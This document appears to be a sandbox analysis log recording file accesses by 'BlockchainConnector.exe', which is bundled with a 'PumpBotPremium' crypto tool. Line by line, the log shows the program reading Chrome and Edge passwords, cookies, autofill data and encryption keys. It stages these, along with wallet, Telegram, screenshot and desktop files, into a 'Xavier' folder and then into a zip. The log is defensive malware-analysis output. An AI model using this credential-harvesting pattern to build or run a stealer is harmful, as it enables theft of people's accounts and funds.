Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\opencv_videoio_ffmpeg490_64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Wallets VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\RecoveryImproved VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_cookies.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Cookies\Chrome_Default_cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Chrome_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Chrome_Default_AFILLS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_pass.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_Local State VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches\Edge_Default_afills.db VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Edge_Default_AFILLS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos\Running_Softwares.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\ONBQCLYSPU\LTKMYBSEYZ.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\BPMLNOBVSB.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\KATAXZVCPS.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\NIKHQAIQAU.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\UMMBDNEQBN.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\Downloads\WKXEWIOTXI.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Caches VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\user_95030.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Files VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Infos VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Telegram VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Wallets VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Chrome_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Edge_Default_PASS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Screenshot.png VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Chrome_Default_AFILLS.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Xavier\Autofills\Edge_Default_AFILLS.txt VolumeInformation Jump to behavior
